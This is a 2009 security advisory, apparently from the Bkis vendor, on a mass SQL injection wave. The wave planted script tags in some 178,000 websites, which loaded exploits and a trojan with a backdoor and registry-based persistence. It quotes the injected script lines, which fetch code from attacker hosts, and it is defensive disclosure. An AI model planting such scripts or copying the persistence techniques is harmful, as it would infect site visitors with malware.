Recently, a new wave of massive SQL injection attacks has been detected by Bkis researchers. At the climax of the wave, according to Google search results, more than 187.000 websites were compromised.
In the infected website list, most of them are Chinese websites, including Chinese government websites with the .gov.cn domain names, .edu.cn websites...
Google search results
All these websites have SQL injection flaw, database has been injected many times with the following code: script src=hxxp://wgwggg.cn:1/1.js script
(Update on 17 Dec 2009: According to our latest analysis, hackers have injected new code into more than 178.000 websites as follow: script src = hxxp://a.118cc.cn script. You can see the Google search results here)
View source of an infected website with malicious script
When users visit these websites, the script will be executed and silently loads hidden iframes which contain exploit codes from malicious websites, then download malwares to the users’ computers.
Malicious code in .js file
Malicious websites use exploit codes of following vulnerabilities:
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002.
Successful exploit will silently download the file upload.css (W32.CSSExploit.Trojan detected by Bkav) and install it on users’ computers.
Virus W32.CSSExploit.Trojan has the following technical details:
- Dumps file: %UserProfile%\[RandomName].drv
- Renames itself to “auto.exe” then copies itself to %ProgramFiles%\Common Files\ folder
- Write the key: [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]
- and registers the service: DrvKiller to run the virus at Windows start-up.
- Copies file “autorun.inf” and itself to all drives for spreading.
- Changes homepage to http://www.playbo[removed]ing.com.cn:8788/
- Installs backdoor to allow hacker to remote control computers
- Downloads and executes many online game viruses and other malwares on the infected computers.
According to the analysis, the virus and the wave of attacks are suspected to be originated from Chinese.
We are still tracking and making further analysis on this attack.
Recommendation for prevention:
- Up to now, many websites are still unfixed. Admins of these websites should quickly remove malicious scripts injected into database and fix websites’ SQL injection flaws to prevent the next wave of attack.
- Users should update the latest Microsoft and Adobe patches.
- Users should update the anti-virus software.